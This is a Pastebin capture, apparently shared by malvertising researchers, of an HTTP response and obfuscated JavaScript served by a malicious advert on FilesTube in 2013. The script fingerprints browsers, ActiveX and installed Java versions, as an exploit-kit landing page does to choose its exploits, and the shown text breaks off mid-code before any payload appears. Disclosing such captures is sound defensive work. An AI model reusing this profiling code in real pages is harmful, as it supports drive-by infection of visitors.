Advertisement
StopMalvertising

Malvertisement on FilesTube

Jan 22nd, 2013
261
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 56.31 KB | None | 0 0
  1. HTTP/1.1 200 OK
  2. Date: Tue, 22 Jan 2013 20:38:25 GMT
  3. Server: Apache/2
  4. X-Powered-By: PHP/5.2.17
  5. Vary: Accept-Encoding,User-Agent
  6. Content-Length: 30239
  7. Keep-Alive: timeout=1, max=100
  8. Connection: Keep-Alive
  9. Content-Type: text/html
  10.  
  11. <html><body></body><script type="text/javascript">var jimmapse=
  12. {
  13. version:"lackjoll",name:"jimmapse",handler:function(c,b,a)
  14. {
  15. return function()
  16. {
  17. c(b,a)
  18. }
  19.  
  20. }
  21. ,isDefined:function(b)
  22. {
  23. return typeof b!="undefined"
  24. }
  25. ,isArray:function(b)
  26. {
  27. return(/array/i).test(Object.prototype.toString.call(b))
  28. }
  29. ,isFunc:function(b)
  30. {
  31. return typeof b=="function"
  32. }
  33. ,isString:function(b)
  34. {
  35. return typeof b=="string"
  36. }
  37. ,isNum:function(b)
  38. {
  39. return typeof b=="number"
  40. }
  41. ,isStrNum:function(b)
  42. {
  43. return(typeof b=="string"&&(/\d/).test(b))
  44. }
  45. ,getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c)
  46. {
  47. var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;
  48. return a?a[0]:null
  49. }
  50. ,compareNums:function(h,f,d)
  51. {
  52. var e=this,c,b,a,g=parseInt;
  53. if(e.isStrNum(h)&&e.isStrNum(f))
  54. {
  55. if(e.isDefined(d)&&d.compareNums)
  56. {
  57. return d.compareNums(h,f)
  58. }
  59. c=h.split(e.splitNumRegx);
  60. b=f.split(e.splitNumRegx);
  61. for(a=0;
  62. a<Math.min(c.length,b.length);
  63. a++)
  64. {
  65. if(g(c[a],10)>g(b[a],10))
  66. {
  67. return 1
  68. }
  69. if(g(c[a],10)<g(b[a],10))
  70. {
  71. return -1
  72. }
  73.  
  74. }
  75.  
  76. }
  77. return 0
  78. }
  79. ,formatNum:function(b,c)
  80. {
  81. var d=this,a,e;
  82. if(!d.isStrNum(b))
  83. {
  84. return null
  85. }
  86. if(!d.isNum(c))
  87. {
  88. c=4
  89. }
  90. c--;
  91. e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);
  92. for(a=0;
  93. a<4;
  94. a++)
  95. {
  96. if(/^(0+)(.+)$/.test(e[a]))
  97. {
  98. e[a]=RegExp.$2
  99. }
  100. if(a>c||!(/\d/).test(e[a]))
  101. {
  102. e[a]="0"
  103. }
  104.  
  105. }
  106. return e.slice(0,4).join(",")
  107. }
  108. ,$$hasMimeType:function(a)
  109. {
  110. return function(c)
  111. {
  112. if(!a.isIE&&c)
  113. {
  114. var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);
  115. for(b=0;
  116. b<d.length;
  117. b++)
  118. {
  119. if(a.isString(d[b])&&/[^\s]/.test(d[b]))
  120. {
  121. f=navigator.mimeTypes[d[b]];
  122. e=f?f.enabledPlugin:0;
  123. if(e&&(e.name||e.description))
  124. {
  125. return f
  126. }
  127.  
  128. }
  129.  
  130. }
  131.  
  132. }
  133. return null
  134. }
  135.  
  136. }
  137. ,findNavPlugin:function(l,e,c)
  138. {
  139. var j=this,h=new RegExp(l,"i"),d=(!j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;
  140. for(f=0;
  141. f<a.length;
  142. f++)
  143. {
  144. m=a[f].description||g;
  145. b=a[f].name||g;
  146. if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext))))
  147. {
  148. if(!k||!(k.test(m)||k.test(b)))
  149. {
  150. return a[f]
  151. }
  152.  
  153. }
  154.  
  155. }
  156. return null
  157. }
  158. ,getMimeEnabledPlugin:function(k,m,c)
  159. {
  160. var e=this,f,b=new RegExp(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;
  161. for(d=0;
  162. d<j.length;
  163. d++)
  164. {
  165. if((f=e.hasMimeType(j[d]))&&(f=f.enabledPlugin))
  166. {
  167. l=f.description||h;
  168. a=f.name||h;
  169. if(b.test(l)||b.test(a))
  170. {
  171. if(!g||!(g.test(l)||g.test(a)))
  172. {
  173. return f
  174. }
  175.  
  176. }
  177.  
  178. }
  179.  
  180. }
  181. return 0
  182. }
  183. ,getPluginFileVersion:function(f,b)
  184. {
  185. var h=this,e,d,g,a,c=-1;
  186. if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version)))
  187. {
  188. return b
  189. }
  190. if(!b)
  191. {
  192. return e
  193. }
  194. e=h.formatNum(e);
  195. b=h.formatNum(b);
  196. d=b.split(h.splitNumRegx);
  197. g=e.split(h.splitNumRegx);
  198. for(a=0;
  199. a<d.length;
  200. a++)
  201. {
  202. if(c>-1&&a>c&&d[a]!="0")
  203. {
  204. return b
  205. }
  206. if(g[a]!=d[a])
  207. {
  208. if(c==-1)
  209. {
  210. c=a
  211. }
  212. if(d[a]!="0")
  213. {
  214. return b
  215. }
  216.  
  217. }
  218.  
  219. }
  220. return e
  221. }
  222. ,AXO:window.ActiveXObject,getAXO:function(a)
  223. {
  224. var f=null,d,b=this,c=
  225. {
  226.  
  227. }
  228. ;try
  229. {
  230. f=new b.AXO(a)
  231. }
  232. catch(d)
  233. {
  234.  
  235. }
  236. return f
  237. }
  238. ,convertFuncs:function(f)
  239. {
  240. var a,g,d,b=/^[\$][\$]/,c=this;
  241. for(a in f)
  242. {
  243. if(b.test(a))
  244. {
  245. try
  246. {
  247. wx=2;
  248. g=a.slice(wx);
  249. if(g.length>0&&!f[g])
  250. {
  251. f[g]=f[a](f);
  252. delete f[a]
  253. }
  254.  
  255. }
  256. catch(d)
  257. {
  258.  
  259. }
  260.  
  261. }
  262.  
  263. }
  264.  
  265. }
  266. ,initObj:function(e,b,d)
  267. {
  268. var a,c;
  269. if(e)
  270. {
  271. if(e[b[0]]==1||d)
  272. {
  273. for(a=0;
  274. a<b.length;
  275. a=a+2)
  276. {
  277. e[b[a]]=b[a+1]
  278. }
  279.  
  280. }
  281. for(a in e)
  282. {
  283. c=e[a];
  284. if(c&&c[b[0]]==1)
  285. {
  286. this.initObj(c,b)
  287. }
  288.  
  289. }
  290.  
  291. }
  292.  
  293. }
  294. ,initScript:function()
  295. {
  296. var c=this,a=navigator,e="/",f,i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"";
  297. c.initObj(c,["$",c]);
  298. for(f in c.Plugins)
  299. {
  300. if(c.Plugins[f])
  301. {
  302. c.initObj(c.Plugins[f],["$",c,"$$",c.Plugins[f]],1)
  303. }
  304.  
  305. }
  306. ;c.OS=100;
  307. if(b)
  308. {
  309. var d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\s*PC",22.3,"",100];
  310. for(f=d.length-2;
  311. f>=0;
  312. f=f-2)
  313. {
  314. if(d[f]&&new RegExp(d[f],"i").test(b))
  315. {
  316. c.OS=d[f+1];
  317. break
  318. }
  319.  
  320. }
  321.  
  322. }
  323. c.convertFuncs(c);
  324. c.head=(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]||document.body||null);
  325. c.isIE=(new Function("return "+e+"*@cc_on!@*"+e+"false"))();
  326. c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(i)?parseFloat(RegExp.$1,10):null;
  327. c.ActiveXEnabled=false;
  328. if(c.isIE)
  329. {
  330. var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];
  331. for(f=0;
  332. f<j.length;
  333. f++)
  334. {
  335. if(c.getAXO(j[f]))
  336. {
  337. c.ActiveXEnabled=true;
  338. break
  339. }
  340.  
  341. }
  342.  
  343. }
  344. c.isGecko=(/Gecko/i).test(h)&&(/Gecko\s*\/\s*\d/i).test(i);
  345. c.verGecko=c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i)?RegExp.$1:"0.9"):null;
  346. c.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
  347. c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;
  348. c.isSafari=((/Apple/i).test(g)||(!g&&!c.isChrome))&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
  349. c.verSafari=c.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(i)?c.formatNum(RegExp.$1):null;
  350. c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
  351. c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(i)||1)?parseFloat(RegExp.$1,10):null;
  352. c.addWinEvent("load",c.handler(c.runWLfuncs,c))
  353. }
  354. ,init:function(d)
  355. {
  356. var c=this,b,d,a=
  357. {
  358. status:-3,plugin:0
  359. }
  360. ;if(!c.isString(d))
  361. {
  362. return a
  363. }
  364. if(d.length==1)
  365. {
  366. c.getVersionDelimiter=d;
  367. return a
  368. }
  369. d=d.toLowerCase().replace(/\s/g,"");
  370. b=c.Plugins[d];
  371. if(!b||!b.getVersion)
  372. {
  373. return a
  374. }
  375. a.plugin=b;
  376. if(!c.isDefined(b.installed))
  377. {
  378. b.installed=null;
  379. b.version=null;
  380. b.version0=null;
  381. b.getVersionDone=null;
  382. b.pluginName=d
  383. }
  384. c.garbage=false;
  385. if(c.isIE&&!c.ActiveXEnabled&&d!=="java")
  386. {
  387. a.status=-2;
  388. return a
  389. }
  390. a.status=1;
  391. return a
  392. }
  393. ,fPush:function(b,a)
  394. {
  395. var c=this;
  396. if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length>0&&c.isFunc(b[0]))))
  397. {
  398. a.push(b)
  399. }
  400.  
  401. }
  402. ,callArray:function(b)
  403. {
  404. var c=this,a;
  405. if(c.isArray(b))
  406. {
  407. for(a=0;
  408. a<b.length;
  409. a++)
  410. {
  411. if(b[a]===null)
  412. {
  413. return
  414. }
  415. c.call(b[a]);
  416. b[a]=null
  417. }
  418.  
  419. }
  420.  
  421. }
  422. ,call:function(c)
  423. {
  424. var b=this,a=b.isArray(c)?c.length:-1;
  425. if(a>0&&b.isFunc(c[0]))
  426. {
  427. c[0](b,a>1?c[1]:0,a>2?c[2]:0,a>3?c[3]:0)
  428. }
  429. else
  430. {
  431. if(b.isFunc(c))
  432. {
  433. c(b)
  434. }
  435.  
  436. }
  437.  
  438. }
  439. ,$$isMinVersion:function(a)
  440. {
  441. return function(h,g,d,c)
  442. {
  443. var e=a.init(h),f,b=-1,j=
  444. {
  445.  
  446. }
  447. ;if(e.status<0)
  448. {
  449. return e.status
  450. }
  451. f=e.plugin;
  452. g=a.formatNum(a.isNum(g)?g.toString():(a.isStrNum(g)?a.getNum(g):"0"));
  453. if(f.getVersionDone!=1)
  454. {
  455. f.getVersion(g,d,c);
  456. if(f.getVersionDone===null)
  457. {
  458. f.getVersionDone=1
  459. }
  460.  
  461. }
  462. a.cleanup();
  463. if(f.installed!==null)
  464. {
  465. b=f.installed<=0.5?f.installed:(f.installed==0.7?1:(f.version===null?0:(a.compareNums(f.version,g,f)>=0?1:-0.1)))
  466. }
  467. ;return b
  468. }
  469.  
  470. }
  471. ,getVersionDelimiter:",",$$getVersion:function(a)
  472. {
  473. return function(g,d,c)
  474. {
  475. var e=a.init(g),f,b,h=
  476. {
  477.  
  478. }
  479. ;if(e.status<0)
  480. {
  481. return null
  482. }
  483. ;f=e.plugin;
  484. if(f.getVersionDone!=1)
  485. {
  486. f.getVersion(null,d,c);
  487. if(f.getVersionDone===null)
  488. {
  489. f.getVersionDone=1
  490. }
  491.  
  492. }
  493. a.cleanup();
  494. b=(f.version||f.version0);
  495. b=b?b.replace(a.splitNumRegx,a.getVersionDelimiter):b;
  496. return b
  497. }
  498.  
  499. }
  500. ,cleanup:function()
  501. {
  502. var a=this;
  503. if(a.garbage&&a.isDefined(window.CollectGarbage))
  504. {
  505. window.CollectGarbage()
  506. }
  507.  
  508. }
  509. ,addWinEvent:function(d,c)
  510. {
  511. var e=this,a=window,b;
  512. if(e.isFunc(c))
  513. {
  514. if(a.addEventListener)
  515. {
  516. a.addEventListener(d,c,false)
  517. }
  518. else
  519. {
  520. if(a.attachEvent)
  521. {
  522. a.attachEvent("on"+d,c)
  523. }
  524. else
  525. {
  526. b=a["on"+d];
  527. a["on"+d]=e.winHandler(c,b)
  528. }
  529.  
  530. }
  531.  
  532. }
  533.  
  534. }
  535. ,winHandler:function(d,c)
  536. {
  537. return function()
  538. {
  539. d();
  540. if(typeof c=="function")
  541. {
  542. c()
  543. }
  544.  
  545. }
  546.  
  547. }
  548. ,WLfuncs0:[],WLfuncs:[],runWLfuncs:function(a)
  549. {
  550. var b=
  551. {
  552.  
  553. }
  554. ;a.winLoaded=true;
  555. a.callArray(a.WLfuncs0);
  556. a.callArray(a.WLfuncs);
  557. if(a.onDoneEmptyDiv)
  558. {
  559. a.onDoneEmptyDiv()
  560. }
  561.  
  562. }
  563. ,winLoaded:false,$$onWindowLoaded:function(a)
  564. {
  565. return function(b)
  566. {
  567. if(a.winLoaded)
  568. {
  569. a.call(b)
  570. }
  571. else
  572. {
  573. a.fPush(b,a.WLfuncs)
  574. }
  575.  
  576. }
  577.  
  578. }
  579. ,$$onDetectionDone:function(a)
  580. {
  581. return function(h,g,c,b)
  582. {
  583. var d=a.init(h),k,e,j=
  584. {
  585.  
  586. }
  587. ;if(d.status==-3)
  588. {
  589. return -1
  590. }
  591. e=d.plugin;
  592. if(!a.isArray(e.funcs))
  593. {
  594. e.funcs=[]
  595. }
  596. if(e.getVersionDone!=1)
  597. {
  598. k=a.isMinVersion?a.isMinVersion(h,"0",c,b):a.getVersion(h,c,b)
  599. }
  600. if(e.installed!=-0.5&&e.installed!=0.5)
  601. {
  602. a.call(g);
  603. return 1
  604. }
  605. if(e.NOTF)
  606. {
  607. a.fPush(g,e.funcs);
  608. return 0
  609. }
  610. return 1
  611. }
  612.  
  613. }
  614. ,div:null,divID:"jimmapse",divWidth:50,pluginSize:1,emptyDiv:function()
  615. {
  616. var d=this,b,h,c,a,f,g;
  617. if(d.div&&d.div.childNodes)
  618. {
  619. for(b=d.div.childNodes.length-1;
  620. b>=0;
  621. b--)
  622. {
  623. c=d.div.childNodes[b];
  624. if(c&&c.childNodes)
  625. {
  626. for(h=c.childNodes.length-1;
  627. h>=0;
  628. h--)
  629. {
  630. g=c.childNodes[h];
  631. try
  632. {
  633. c.removeChild(g)
  634. }
  635. catch(f)
  636. {
  637.  
  638. }
  639.  
  640. }
  641.  
  642. }
  643. if(c)
  644. {
  645. try
  646. {
  647. d.div.removeChild(c)
  648. }
  649. catch(f)
  650. {
  651.  
  652. }
  653.  
  654. }
  655.  
  656. }
  657.  
  658. }
  659. if(!d.div)
  660. {
  661. a=document.getElementById(d.divID);
  662. if(a)
  663. {
  664. d.div=a
  665. }
  666.  
  667. }
  668. if(d.div&&d.div.parentNode)
  669. {
  670. try
  671. {
  672. d.div.parentNode.removeChild(d.div)
  673. }
  674. catch(f)
  675. {
  676.  
  677. }
  678. d.div=null
  679. }
  680.  
  681. }
  682. ,DONEfuncs:[],onDoneEmptyDiv:function()
  683. {
  684. var c=this,a,b;
  685. if(!c.winLoaded)
  686. {
  687. return
  688. }
  689. if(c.WLfuncs&&c.WLfuncs.length&&c.WLfuncs[c.WLfuncs.length-1]!==null)
  690. {
  691. return
  692. }
  693. for(a in c)
  694. {
  695. b=c[a];
  696. if(b&&b.funcs)
  697. {
  698. if(b.OTF==3)
  699. {
  700. return
  701. }
  702. if(b.funcs.length&&b.funcs[b.funcs.length-1]!==null)
  703. {
  704. return
  705. }
  706.  
  707. }
  708.  
  709. }
  710. for(a=0;
  711. a<c.DONEfuncs.length;
  712. a++)
  713. {
  714. c.callArray(c.DONEfuncs)
  715. }
  716. c.emptyDiv()
  717. }
  718. ,getWidth:function(c)
  719. {
  720. if(c)
  721. {
  722. var a=c.scrollWidth||c.offsetWidth,b=this;
  723. if(b.isNum(a))
  724. {
  725. return a
  726. }
  727.  
  728. }
  729. return -1
  730. }
  731. ,getTagStatus:function(m,g,a,b)
  732. {
  733. var c=this,f,k=m.span,l=c.getWidth(k),h=a.span,j=c.getWidth(h),d=g.span,i=c.getWidth(d);
  734. if(!k||!h||!d||!c.getDOMobj(m))
  735. {
  736. return -2
  737. }
  738. if(j<i||l<0||j<0||i<0||i<=c.pluginSize||c.pluginSize<1)
  739. {
  740. return 0
  741. }
  742. if(l>=i)
  743. {
  744. return -1
  745. }
  746. try
  747. {
  748. if(l==c.pluginSize&&(!c.isIE||c.getDOMobj(m).readyState==4))
  749. {
  750. if(!m.winLoaded&&c.winLoaded)
  751. {
  752. return 1
  753. }
  754. if(m.winLoaded&&c.isNum(b))
  755. {
  756. if(!c.isNum(m.count))
  757. {
  758. m.count=b
  759. }
  760. if(b-m.count>=10)
  761. {
  762. return 1
  763. }
  764.  
  765. }
  766.  
  767. }
  768.  
  769. }
  770. catch(f)
  771. {
  772.  
  773. }
  774. return 0
  775. }
  776. ,getDOMobj:function(g,a)
  777. {
  778. var f,d=this,c=g?g.span:0,b=c&&c.firstChild?1:0;
  779. try
  780. {
  781. if(b&&a)
  782. {
  783. d.div.focus()
  784. }
  785.  
  786. }
  787. catch(f)
  788. {
  789.  
  790. }
  791. return b?c.firstChild:null
  792. }
  793. ,setStyle:function(b,g)
  794. {
  795. var f=b.style,a,d,c=this;
  796. if(f&&g)
  797. {
  798. for(a=0;
  799. a<g.length;
  800. a=a+2)
  801. {
  802. try
  803. {
  804. f[g[a]]=g[a+1]
  805. }
  806. catch(d)
  807. {
  808.  
  809. }
  810.  
  811. }
  812.  
  813. }
  814.  
  815. }
  816. ,insertDivInBody:function(a,i)
  817. {
  818. var h,f=this,b="pd33993399",d=null,j=i?window.top.document:window.document,c="<",g=(j.getElementsByTagName("body")[0]||j.body);
  819. if(!g)
  820. {
  821. try
  822. {
  823. j.write(c+'div id="'+b+'">o'+c+"/div>");
  824. d=j.getElementById(b)
  825. }
  826. catch(h)
  827. {
  828.  
  829. }
  830.  
  831. }
  832. g=(j.getElementsByTagName("body")[0]||j.body);
  833. if(g)
  834. {
  835. if(g.firstChild&&f.isDefined(g.insertBefore))
  836. {
  837. g.insertBefore(a,g.firstChild)
  838. }
  839. else
  840. {
  841. g.appendChild(a)
  842. }
  843. if(d)
  844. {
  845. g.removeChild(d)
  846. }
  847.  
  848. }
  849. else
  850. {
  851.  
  852. }
  853.  
  854. }
  855. ,insertHTML:function(g,b,h,a,l)
  856. {
  857. var m,n=document,k=this,q,p=n.createElement("span"),o,j,f="<";
  858. var c=["outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"];
  859. var i="outline-style:none;
  860. border-style:none;
  861. padding:0px;
  862. margin:0px;
  863. visibility:visible;
  864. ";
  865. if(!k.isDefined(a))
  866. {
  867. a=""
  868. }
  869. if(k.isString(g)&&(/[^\s]/).test(g))
  870. {
  871. g=g.toLowerCase().replace(/\s/g,"");
  872. q=f+g+' width="'+k.pluginSize+'" height="'+k.pluginSize+'" ';
  873. q+='style="'+i+'display:inline;
  874. " ';
  875. for(o=0;
  876. o<b.length;
  877. o=o+2)
  878. {
  879. if(/[^\s]/.test(b[o+1]))
  880. {
  881. q+=b[o]+'="'+b[o+1]+'" '
  882. }
  883.  
  884. }
  885. q+=">";
  886. for(o=0;
  887. o<h.length;
  888. o=o+2)
  889. {
  890. if(/[^\s]/.test(h[o+1]))
  891. {
  892. q+=f+'param name="'+h[o]+'" value="'+h[o+1]+'" />'
  893. }
  894.  
  895. }
  896. q+=a+f+"/"+g+">"
  897. }
  898. else
  899. {
  900. q=a
  901. }
  902. if(!k.div)
  903. {
  904. j=n.getElementById(k.divID);
  905. if(j)
  906. {
  907. k.div=j
  908. }
  909. else
  910. {
  911. k.div=n.createElement("div");
  912. k.div.id=k.divID
  913. }
  914. k.setStyle(k.div,c.concat(["width",k.divWidth+"px","height",(k.pluginSize+3)+"px","fontSize",(k.pluginSize+3)+"px","lineHeight",(k.pluginSize+3)+"px","verticalAlign","baseline","display","block"]));
  915. if(!j)
  916. {
  917. k.setStyle(k.div,["position","absolute","right","0px","top","0px"]);
  918. k.insertDivInBody(k.div)
  919. }
  920.  
  921. }
  922. if(k.div&&k.div.parentNode)
  923. {
  924. k.setStyle(p,c.concat(["fontSize",(k.pluginSize+3)+"px","lineHeight",(k.pluginSize+3)+"px","verticalAlign","baseline","display","inline"]));
  925. try
  926. {
  927. p.innerHTML=q
  928. }
  929. catch(m)
  930. {
  931.  
  932. }
  933. ;try
  934. {
  935. k.div.appendChild(p)
  936. }
  937. catch(m)
  938. {
  939.  
  940. }
  941. ;return
  942. {
  943. span:p,winLoaded:k.winLoaded,tagName:g,outerHTML:q
  944. }
  945.  
  946. }
  947. return
  948. {
  949. span:null,winLoaded:k.winLoaded,tagName:"",outerHTML:q
  950. }
  951.  
  952. }
  953. ,file:
  954. {
  955. $:1,any:"fileStorageAny999",valid:"fileStorageValid999",save:function(d,f,c)
  956. {
  957. var b=this,e=b.$,a;
  958. if(d&&e.isDefined(c))
  959. {
  960. if(!d[b.any])
  961. {
  962. d[b.any]=[]
  963. }
  964. if(!d[b.valid])
  965. {
  966. d[b.valid]=[]
  967. }
  968. d[b.any].push(c);
  969. a=b.split(f,c);
  970. if(a)
  971. {
  972. d[b.valid].push(a)
  973. }
  974.  
  975. }
  976.  
  977. }
  978. ,getValidLength:function(a)
  979. {
  980. return a&&a[this.valid]?a[this.valid].length:0
  981. }
  982. ,getAnyLength:function(a)
  983. {
  984. return a&&a[this.any]?a[this.any].length:0
  985. }
  986. ,getValid:function(c,a)
  987. {
  988. var b=this;
  989. return c&&c[b.valid]?b.get(c[b.valid],a):null
  990. }
  991. ,getAny:function(c,a)
  992. {
  993. var b=this;
  994. return c&&c[b.any]?b.get(c[b.any],a):null
  995. }
  996. ,get:function(d,a)
  997. {
  998. var c=d.length-1,b=this.$.isNum(a)?a:c;
  999. return(b<0||b>c)?null:d[b]
  1000. }
  1001. ,split:function(g,c)
  1002. {
  1003. var b=this,e=b.$,f=null,a,d;
  1004. g=g?g.replace(".","\."):"";
  1005. d=new RegExp("^(.*[^\/])("+g+"\s*)$");
  1006. if(e.isString(c)&&d.test(c))
  1007. {
  1008. a=(RegExp.$1).split("/");
  1009. f=
  1010. {
  1011. name:a[a.length-1],ext:RegExp.$2,full:c
  1012. }
  1013. ;a[a.length-1]="";
  1014. f.path=a.join("/")
  1015. }
  1016. return f
  1017. }
  1018. ,z:0
  1019. }
  1020. ,Plugins:
  1021. {
  1022. java:
  1023. {
  1024. mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",navigator:
  1025. {
  1026. a:window.navigator.javaEnabled(),javaEnabled:function()
  1027. {
  1028. return this.a
  1029. }
  1030. ,mimeObj:0,pluginObj:0
  1031. }
  1032. ,OTF:null,minIEver:7,debug:0,debugEnable:function()
  1033. {
  1034. var a=this,b=a.$;
  1035. a.debug=1
  1036. }
  1037. ,isDisabled:
  1038. {
  1039. $:1,DTK:function()
  1040. {
  1041. var a=this,c=a.$,b=a.$$;
  1042. if((c.isGecko&&c.compareNums(c.verGecko,c.formatNum("1.6"))<=0)||(c.isSafari&&c.OS==1&&(!c.verSafari||c.compareNums(c.verSafari,"5,1,0,0")<0))||c.isChrome||(c.isIE&&!c.ActiveXEnabled))
  1043. {
  1044. return 1
  1045. }
  1046. return 0
  1047. }
  1048. ,AXO:function()
  1049. {
  1050. var a=this,c=a.$,b=a.$$;
  1051. return(!c.isIE||!c.ActiveXEnabled||(!b.debug&&b.DTK.query().status!==0))
  1052. }
  1053. ,navMime:function()
  1054. {
  1055. var b=this,d=b.$,c=b.$$,a=c.navigator;
  1056. if(d.isIE||!a.mimeObj||!a.pluginObj)
  1057. {
  1058. return 1
  1059. }
  1060. return 0
  1061. }
  1062. ,navPlugin:function()
  1063. {
  1064. var b=this,d=b.$,c=b.$$,a=c.navigator;
  1065. if(d.isIE||!a.mimeObj||!a.pluginObj)
  1066. {
  1067. return 1
  1068. }
  1069. return 0
  1070. }
  1071. ,windowDotJava:function()
  1072. {
  1073. var a=this,c=a.$,b=a.$$;
  1074. if(!window.java)
  1075. {
  1076. return 1
  1077. }
  1078. if(c.OS==2&&c.verOpera&&c.verOpera<9.2&&c.verOpera>=9)
  1079. {
  1080. return 1
  1081. }
  1082. if(c.verGecko&&c.compareNums(c.verGecko,"1,9,0,0")<0&&c.compareNums(c.verGecko,"1,8,0,0")>=0)
  1083. {
  1084. return 1
  1085. }
  1086. return 0
  1087. }
  1088. ,allApplets:function()
  1089. {
  1090. var b=this,d=b.$,c=b.$$,a=c.navigator;
  1091. if(d.OS>=20)
  1092. {
  1093. return 0
  1094. }
  1095. if(d.verOpera&&d.verOpera<11&&!a.javaEnabled()&&!c.lang.System.getProperty()[0])
  1096. {
  1097. return 1
  1098. }
  1099. if((d.verGecko&&d.compareNums(d.verGecko,d.formatNum("2"))<0)&&!a.mimeObj&&!c.lang.System.getProperty()[0])
  1100. {
  1101. return 1
  1102. }
  1103. return 0
  1104. }
  1105. ,AppletTag:function()
  1106. {
  1107. var b=this,d=b.$,c=b.$$,a=c.navigator;
  1108. return d.isIE?!a.javaEnabled():0
  1109. }
  1110. ,ObjectTag:function()
  1111. {
  1112. var a=this,c=a.$,b=a.$$;
  1113. return c.isIE?!c.ActiveXEnabled:0
  1114. }
  1115. ,z:0
  1116. }
  1117. ,getVerifyTagsDefault:function()
  1118. {
  1119. var a=this,c=a.$,b=[1,0,1];
  1120. if(c.OS>=20)
  1121. {
  1122. return b
  1123. }
  1124. if((c.isIE&&(c.verIE<9||!c.ActiveXEnabled))||(c.verGecko&&c.compareNums(c.verGecko,c.formatNum("2"))<0)||(c.isSafari&&(!c.verSafari||c.compareNums(c.verSafari,c.formatNum("4"))<0))||(c.verOpera&&c.verOpera<10))
  1125. {
  1126. b=[1,1,1]
  1127. }
  1128. return b
  1129. }
  1130. ,getVersion:function(j,g,i)
  1131. {
  1132. var b=this,d=b.$,e,a=b.applet,h=b.verify,k=b.navigator,f=null,l=null,c=null;
  1133. if(b.getVersionDone===null)
  1134. {
  1135. b.OTF=0;
  1136. k.mimeObj=d.hasMimeType(b.mimeType);
  1137. if(k.mimeObj)
  1138. {
  1139. k.pluginObj=k.mimeObj.enabledPlugin
  1140. }
  1141. if(h)
  1142. {
  1143. h.begin()
  1144. }
  1145.  
  1146. }
  1147. a.setVerifyTagsArray(i);
  1148. d.file.save(b,".jar",g);
  1149. if(b.getVersionDone===0)
  1150. {
  1151. if(a.should_Insert_Query_Any())
  1152. {
  1153. e=a.insert_Query_Any();
  1154. b.setPluginStatus(e[0],e[1],f)
  1155. }
  1156. return
  1157. }
  1158. if((!f||b.debug)&&b.DTK.query().version)
  1159. {
  1160. f=b.DTK.version
  1161. }
  1162. if((!f||b.debug)&&b.navMime.query().version)
  1163. {
  1164. f=b.navMime.version
  1165. }
  1166. if((!f||b.debug)&&b.navPlugin.query().version)
  1167. {
  1168. f=b.navPlugin.version
  1169. }
  1170. if((!f||b.debug)&&b.AXO.query().version)
  1171. {
  1172. f=b.AXO.version
  1173. }
  1174. if(b.nonAppletDetectionOk(f))
  1175. {
  1176. c=f
  1177. }
  1178. if(!c||b.debug||a.VerifyTagsHas(2.2)||a.VerifyTagsHas(2.5))
  1179. {
  1180. e=b.lang.System.getProperty();
  1181. if(e[0])
  1182. {
  1183. f=e[0];
  1184. c=e[0];
  1185. l=e[1]
  1186. }
  1187.  
  1188. }
  1189. b.setPluginStatus(c,l,f);
  1190. if(a.should_Insert_Query_Any())
  1191. {
  1192. e=a.insert_Query_Any();
  1193. if(e[0])
  1194. {
  1195. c=e[0];
  1196. l=e[1]
  1197. }
  1198.  
  1199. }
  1200. b.setPluginStatus(c,l,f)
  1201. }
  1202. ,nonAppletDetectionOk:function(b)
  1203. {
  1204. var d=this,e=d.$,a=d.navigator,c=1;
  1205. if(!b||(!a.javaEnabled()&&!d.lang.System.getPropertyHas(b))||(!e.isIE&&!a.mimeObj&&!d.lang.System.getPropertyHas(b))||(e.isIE&&!e.ActiveXEnabled))
  1206. {
  1207. c=0
  1208. }
  1209. else
  1210. {
  1211. if(e.OS>=20)
  1212. {
  1213.  
  1214. }
  1215. else
  1216. {
  1217. if(d.info&&d.info.getPlugin2Status()<0&&d.info.BrowserRequiresPlugin2())
  1218. {
  1219. c=0
  1220. }
  1221.  
  1222. }
  1223.  
  1224. }
  1225. return c
  1226. }
  1227. ,setPluginStatus:function(d,f,a)
  1228. {
  1229. var c=this,e=c.$,b;
  1230. a=a||c.version0;
  1231. if(c.OTF>0)
  1232. {
  1233. d=d||c.lang.System.getProperty()[0]
  1234. }
  1235. if(c.OTF<3)
  1236. {
  1237. b=d?1:(a?-0.2:-1);
  1238. if(c.installed===null||b>c.installed)
  1239. {
  1240. c.installed=b
  1241. }
  1242.  
  1243. }
  1244. if(c.OTF==2&&c.NOTF&&!c.applet.getResult()[0]&&!c.lang.System.getProperty()[0])
  1245. {
  1246. c.installed=a?-0.2:-1
  1247. }
